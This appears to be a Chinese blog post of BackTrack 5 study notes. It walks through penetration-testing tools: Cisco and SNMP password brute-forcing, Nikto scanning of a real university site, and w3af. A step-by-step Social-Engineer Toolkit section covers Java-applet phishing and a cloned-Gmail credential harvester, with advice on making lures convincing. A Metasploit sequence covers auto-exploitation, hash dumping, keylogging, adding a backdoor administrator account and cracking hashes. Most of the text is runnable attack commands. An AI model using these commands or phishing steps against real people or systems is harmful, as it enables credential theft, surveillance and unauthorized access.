Back Track5学习笔记二

漏洞发现

第一部分Cisco工具

1  CAT安全审计工具,扫描Cissco路由器的一般性漏洞

./CAT -h 192.168.8.254 -w lists/community -a lists/passwords

2.      Cisco Passwd Scanner, 用于发现拥有默认telnet密码“Cisco”的Cisco设备

./ciscos 192.168.8.1 3 -t 4 -C 10

第二部SNM扫描工具

1.      ADMSnmp, ADMSnmp用于暴力PJSNMP community字串,使用预先定义的“wordlist

./ADMsnmp 192.168.8.34 -wordf snmp.passwd

2.      Snmp Enum在获得community后,可以使用snmp enum获取大量关于Ciscowindowslinux的信息

./snmpenum.pl 192.168.8.34 private cisco.txt

第三部分HTTP工具

1.      Burp Suite分析和攻击web运用

java -jar burpsuite_v1.4.jar

Proxy 代理端口可以编辑 intruder 选项卡选择intruder on 即开启代理端口为8080 更改浏览器的连接设置就可用此代理

2.      Grendel Scan 网页漏洞扫描工具

/pentest/web/grendel-scan# ./grendel.sh

3.      Nikto2 安全漏洞扫描工具

/pentest/web/nikto# ./nikto.pl  -h jw.nwpu.edu.cn -C -p 80 -T 3478b -t 3 -D \ V -o webtest -F htm

其中 webtest里存放的扫描结果

4.      w3af 特性丰富的web运用攻击和审计的框架,他协助检测和攻击

/pentest/web/w3af# ./w3af_console

参数配置

w3af>>>plugins(插件设置)

w3af/plugins>>>help

w3af/plugins>>>output console,htmlFile(插件输出设置)

w3af/plugins>>>output config htmlFile(插件文件格式设置)

w3af/plugins/output/config:htmlFile>>>set verbose True(冗余模式打开)

w3af/plugins/output/config:htmlFile>>>set fileName testreport.html(输出文件名)

w3af/plugins/output/config:htmlFile>>>back

w3af/plugins>>>output config console(插件模块设置)

w3af/plugins/output/config:console>>>set verbose False

w3af/plugins/output/config:console>>>back

w3af/plugins>>>audit htaccessMethods , osCommanding , sqli , xss(加载各种脚本)

w3af/plugins>>>back

w3af>>>target(目标地址设置)

w3af/config:target>>>set target http://xx.xx.xx.xx/

w3af/config:target>>>back

w3af>>>start(开始攻击)

5.     WAFW00F 探测WAF(运用层防火墙)的工具,会返回在这个之前有什么运用级防火墙是哪个厂商的

/pentest/web/waffit# ./wafw00f.py  http://www.baidu.com

6.     Samrdump

/pentest/python/impacket-examples# ./samrdump.py administrator:cisco@192.168.8.254 445/SMB

                第五部分综合漏洞发现工具Nessus

开启服务

/etc/init.d/nessusd start

打开https://localhost:8834/

用户名:cisco 密码:cisco

               社会工程学工具SET

第一部分:Java Applet Attack Method(利用java的病毒攻击)

第二部分:Credential Harvester Attack Method(收集个人信息)

1.      SET是一个高级的,多功能的,并且易于使用的计算机社会工程学工具集

  /pentest/exploits/set/config# vi set_config  (查看配置信息)

METASPLOIT_PATH=/pentest/exploits/framework3MSF漏洞利用攻击工具路径)
ETTERCAP=ON(一个网络欺骗工具功能是否开放)
ETTERCAP_PATH=/usr/share/ettercap
ETTERCAP_DNSIFF_INTERFACE=eth1
(使用DNS欺骗的网络接口)
EMAIL_PROVIDER=GMAIL(发送垃圾邮件的提供商)
SELF_SIGNED_APPLET=ON(自签名插件)
JAVA_ID_PARAM=Secure Java Applet(签名时候是哪个厂商产生的,后面这个名字写的靠谱点,让人相信会去点击)

 

命令

/pentest/exploits/set# ./set

然后set> 1

set> 2

set:webattack>1

set:webattack>2

set:payloads>2

set:encoding>16

set:phishing>1

set:phishing> Your gmail email address: :pythonisfun@gmail.com

Email password:

set:phishing> Flag this message/s as high priority? [yes|no]:yes

set:phishing> Email subject:Thank you! For your application.

set:phishing> Send the message as html or plain? 'h' or 'p' [p]:

set:phishing> Enter the body of the message, hit return for a new line. Control+c when finished:welcome to our sites: http://192.168.8.167

Next line of the body: ^C

以上做的是克隆百度的站点,通过自己的Gmail发送邮件给被攻击者,只要他人点击http://192.168.8.167,并加载运行那个java插件secure java applet就会中招。(在WIN72003上点击链接,并没有弹出secure java applet插件,也许是浏览器的安全设置弄的)

如果有人中招,按Ctrl+C终止。

msf  exploit(handler) > sessions –i (查看中招的主机信息)

 

命令/pentest/exploits/set# ./set

然后set> 1

set> 2

set:webattack>3

set:webattack>2

set:mailer>1

Enter the url to clone:https://gmail.com

1--->发送给单一目标

Send Email To1392688486@qq.com

1-->用gmail发送邮件攻击

Your Gmail email addressxxxxx@gmail.com

Email passwordxxxxx

Flag this message/s as high priority[yes|no]yes(是不是高优先标签)

Email subject:(Email的标题,考你的语文水平,欺骗他让他点你的站点)

Send the message as htmal or plain? 'h' or 'p' [p]:(发送文件是以什么格式)

Enter the body of the message, hit return for a new line,Control+c when finished:(编写邮件的内容按Ctrl+C来结束)

这个只要他人点击你给的链接(最好自己有一个域名),输入用户名和密码,我们就可以知道了

应用层攻击MSF

1.  启动msfconsole 命令:msfconsole

msf>hosts     (查看扫描过的主机数据库)

msf>host –d   (删除这个数据库里的内容 hosts –h可以知道hosts所有用法)

msf>services   (存放扫描主机开启的服务的数据库)

          msf>nmap –T Aggressive –sV –n –O –v 192.168.8.1/24 (扫描这个网段)

          msf>load db_autopwn   (没有db_autopwn这个模块,必须先下载,然后用命令cp db_autopwn.rb /opt/framework3/msf3/plugins/ 拷贝到此处,每次使用这个模块之前load db_autopwn)

          msf>db_autopwn –p –t –e  (从扫描的结果中自动攻击,-I后接指定IP)

          msf>sessions –i     (查看攻破的主机)

          msf>session –i 1  (主机ID 1,连到这个主机)

          meterpreter>run hashdump    (获取账号hash)

          meterpreter>ps    (查看控制主机的所有进程)

          meterpreter>migrate 1576   (迁移到1576进程ID,获得管理员权限)

          meterpreter>keyscan_start    (监视主机键盘记录)

          meterpreter>keyscan_dump   (显示键盘记录)

          meterpreter>keyscan_stop     (停止)

          meterpreter>run getgui –e     (开启被控制主机的远程登录服务)

          meterpreter>run getgui –u cisco –p cisco  (向远程主机添加拥有管理员权限的账号:cisco 密码:cisco )

       然后开启远程登录软件:rdesktop 192.168.8.34:3389(被控制主机IP,port),输入账号:cisco 密码:cisco

        破解刚才获取的hash值得到管理员密码:

        /pentest/passwords# ophcrack –g –d ~/tables_xp_free_small –t ~/tables_xp_free_small/ -f ~/sam-new-test.

       其中tables_xp_free_small是字典,sam-new-test是刚才得到的hash

  • 0
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值